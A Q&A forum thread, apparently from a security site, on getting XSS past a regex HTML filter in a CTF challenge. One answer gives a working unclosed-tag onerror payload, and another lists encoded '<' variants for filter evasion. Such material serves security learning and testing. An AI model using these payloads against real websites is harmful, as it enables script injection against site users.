How do I bypass a regex filter that filters all html to avoid xss?

Question

How do I bypass a regex filter that filters all html to avoid xss? I've tried using things like <img src="aa" onerror="alert(1)"> but still no luck. This is for a CTF challenge btw.

The regex is: <[\s\S]*> and the validator is running on a TypeScript server

score 2 · Answer 1 · answered Nov 08 '21 at 13:29

2

This filter doesn't reject unclosed tags, so you could inject:

<img src="x" onerror="alert(1)"

The tag will be closed as soon as the parser encounters a ">", which is obviously quite common in HTML contexts.

answered Nov 08 '21 at 13:29

Benoit Esnard

13,942
7
65
65

score 0 · Answer 2 · answered Jun 11 '21 at 11:10

0

https://owasp.org/www-community/xss-filter-evasion-cheatsheet has a section on alternative characters to <. Here is a summary:

%3C
&#60, &#060, &#0060, &#00060, &#000060, &#0000060

(and try with a ; on the end)

Also, variations on the same zero padding theme above bu with hex:

&#x3c, &#X3c, &#x3C, &#X3C

And:

\x3c, \x3C, \u003c, \u003C

answered Jun 11 '21 at 11:10

Martin Thompson

101
4

I've tried bypasses like this, but it still detects them. – ctfhard Jun 11 '21 at 15:16

How do I bypass a regex filter that filters all html to avoid xss?

2 Answers2